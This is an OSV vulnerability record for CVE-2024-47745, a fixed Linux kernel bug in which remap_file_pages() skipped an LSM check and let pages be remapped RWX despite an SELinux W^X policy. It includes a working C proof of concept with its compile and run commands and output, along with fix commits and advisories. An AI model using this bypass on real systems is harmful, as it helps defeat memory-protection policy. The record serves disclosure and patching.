{"id":"CVE-2024-47745","summary":"mm: call the security_mmap_file() LSM hook in remap_file_pages()","details":"In the Linux kernel, the following vulnerability has been resolved:\n\nmm: call the security_mmap_file() LSM hook in remap_file_pages()\n\nThe remap_file_pages syscall handler calls do_mmap() directly, which\ndoesn't contain the LSM security check. And if the process has called\npersonality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for\nRW pages, this will actually result in remapping the pages to RWX,\nbypassing a W^X policy enforced by SELinux.\n\nSo we should check prot by security_mmap_file LSM hook in the\nremap_file_pages syscall handler before do_mmap() is called. Otherwise, it\npotentially permits an attacker to bypass a W^X policy enforced by\nSELinux.\n\nThe bypass is similar to CVE-2016-10044, which bypass the same thing via\nAIO and can be found in [1].\n\nThe PoC:\n\n$ cat \u003e test.c\n\nint main(void) {\n\tsize_t pagesz = sysconf(_SC_PAGE_SIZE);\n\tint mfd = syscall(SYS_memfd_create, \"test\", 0);\n\tconst char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,\n\t\tMAP_SHARED, mfd, 0);\n\tunsigned int old = syscall(SYS_personality, 0xffffffff);\n\tsyscall(SYS_personality, READ_IMPLIES_EXEC | old);\n\tsyscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);\n\tsyscall(SYS_personality, old);\n\t// show the RWX page exists even if W^X policy is enforced\n\tint fd = open(\"/proc/self/maps\", O_RDONLY);\n\tunsigned char buf2[1024];\n\twhile (1) {\n\t\tint ret = read(fd, buf2, 1024);\n\t\tif (ret \u003c= 0) break;\n\t\twrite(1, buf2, ret);\n\t}\n\tclose(fd);\n}\n\n$ gcc test.c -o test\n$ ./test | grep rwx\n7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)\n\n[PM: subject line tweaks]","modified":"2026-04-02T12:20:27.622553Z","published":"2024-10-21T12:14:12.488Z","related":["MGASA-2024-0344","MGASA-2024-0345","SUSE-SU-2024:3983-1","SUSE-SU-2024:3984-1","SUSE-SU-2024:3985-1","SUSE-SU-2024:3986-1","SUSE-SU-2024:4100-1","SUSE-SU-2024:4315-1","SUSE-SU-2024:4318-1","SUSE-SU-2024:4364-1","SUSE-SU-2024:4376-1","SUSE-SU-2024:4387-1","SUSE-SU-2025:0034-1","SUSE-SU-2025:20163-1","SUSE-SU-2025:20164-1","SUSE-SU-2025:20246-1","SUSE-SU-2025:20247-1","USN-7276-1","USN-7277-1","openSUSE-SU-2024:14500-1","openSUSE-SU-2025:14705-1"],"database_specific":{"cna_assigner":"Linux","osv_generated_from":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/47xxx/CVE-2024-47745.json"},"references":[{"type":"WEB","url":"https://git.kernel.org/stable/c/0f910dbf2f2a4a7820ba4bac7b280f7108aa05b1"},{"type":"WEB","url":"https://git.kernel.org/stable/c/3393fddbfa947c8e1fdcc4509226905ffffd8b89"},{"type":"WEB","url":"https://git.kernel.org/stable/c/49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178"},{"type":"WEB","url":"https://git.kernel.org/stable/c/ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3"},{"type":"WEB","url":"https://git.kernel.org/stable/c/ea7e2d5e49c05e5db1922387b09ca74aa40f46e2"},{"type":"WEB","url":"https://lists.debian.org/debian-lts-announce/2025/03/msg00001.html"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/47xxx/CVE-2024-47745.json"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47745"},{"type":"PACKAGE","url":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git","events":[{"introduced":"c8d78c1823f46519473949d33f0d1d33fe21ea16"},{"fixed":"0f910dbf2f2a4a7820ba4bac7b280f7108aa05b1"},{"fixed":"49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178"},{"fixed":"3393fddbfa947c8e1fdcc4509226905ffffd8b89"},{"fixed":"ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3"},{"fixed":"ea7e2d5e49c05e5db1922387b09ca74aa40f46e2"}]},{"type":"GIT","repo":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git","events":[{"introduced":"0"},{"last_affected":"097f98edde717ce09f217d8a285fe357dcd29fd1"}]}],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2024-47745.json"}}],"schema_version":"1.7.5"}